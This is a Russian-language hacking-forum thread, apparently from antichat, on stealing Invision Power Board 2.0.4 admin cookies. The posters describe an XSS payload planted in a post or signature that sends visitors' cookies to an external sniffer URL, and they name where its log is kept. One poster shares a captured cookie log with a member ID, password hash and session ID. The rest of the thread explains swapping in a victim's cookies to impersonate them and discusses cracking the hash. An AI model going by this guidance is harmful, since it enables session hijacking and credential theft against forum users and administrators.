Это код, который нужно запостить на форуме или всунуть в подпись. А потом смотришь лог сниффера, который ты укажешь ( в примере это http://antichat.ru/cgi-bin/s.jpg?) и тама будут куки=)) Которые можно всунуть вместо своих или расшифроывть хэш и получить пароль юзера из чьих куков ты вытащил этот самый хэш. НО в твоём случае (IPB 2.0.4) расшифровать хэш неудасться. Тоесть под админом ты зайдёшь (если куки отснифаешь), но в админку не попадёшь. Фух=) Думаю всё понятно объяснил=))))

ЗЫ http://antichat.ru/cgi-bin/s.jpg? это сам сниффер, а лог находится по адресу http://antichat.ru/sniff/log.php

Почему это не расшифрует ? Вообщето они расшифровываются, видео Coyl'a смотри

D1mOn Я смотрел. А тебе хочу сказать, что этот способ вытаскивания СОЛИ имхо уже почти на всех форумах не пашет. А без соли до старости брутить будешь

Блин.
1. Видео Coyl Для версий ниже 2.0.4
2. Он ломает через XSS, то есть соли у него нет!

Не вводи людей в заблуждение.

__________________
Full DNS report

Azazel =)))))))))

Вот что получилось, после написания сообщения.

REFERER=http://forum.prov.ru/index.php?act=Post&CODE=08&f=15&t=3018&p=28228&st=
QUERY=member_id=[ТУТ МОЙ ID]; pass_hash=[И КАК Я ПОНЯЛ ХЭШ ТОЖЕ МОЙ]; forum_read=a:38:{i:6;i:1134040767;i:67;i:112980677 0;i:8;i:1134042471;i:15;i:1133611554;i:29;i:113076 1837;i:39;i:1133201153;i:53;i:1132441062;i:36;i:11 33359705;i:38;i:1133969210;i:42;i:1132508047;i:3;i :1133113948;i:16;i:1130760137;i:5;i:1133069997;i:7 ;i:1132494509;i:22;i:1133882625;i:0;i:1132854238;i :34;i:1131694957;i:45;i:1132471894;i:23;i:11324720 85;i:4;i:1133587911;i:2;i:1132494411;i:58;i:113327 0999;i:27;i:1133877568;i:50;i:1131688492;i:63;i:11 31702833;i:57;i:1131608719;i:40;i:1132654583;i:70; i:1131968061;i:41;i:1133028326;i:14;i:1131631814;i :59;i:1131695071;i:61;i:1131703952;i:37;i:11324714 39;i:32;i:1131710395;i:52;i:1131867491;i:12;i:1132 494525;i:51;i:1133271011;i:65;i:1134042675;}; anonlogin=-1; collapseprefs; open_qr=0; bbmode=normal; session_id=38219acbf90cc236847b83d355b503ae; modtids=,; topicsread=a:3:{i:2866;i:1134042466;i:177;i:113404 2366;i:3018;i:1134042916;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102))

Azazel
Я пробовал тот сплоит который был в видео на этом форуме у меня лн не пошел... Пробовал другие также.
Diablo
Ну правильно XSS работает... Теперь жди чтоб в место твоего ID и Хэша прилетели ID и Хэш Админа

Ну всё ок. Если ты по Id уверен, что это твои куки, то тогда жди другие=)) Потом когда будут не твои куки, то ты сможешь через Оперу (во встроенном редакторе кук) поменять свой хэш и Id на то, что тебе придёт=))) Вот и всё. После обновления страницы ты будешь тем, чьи куки пришли.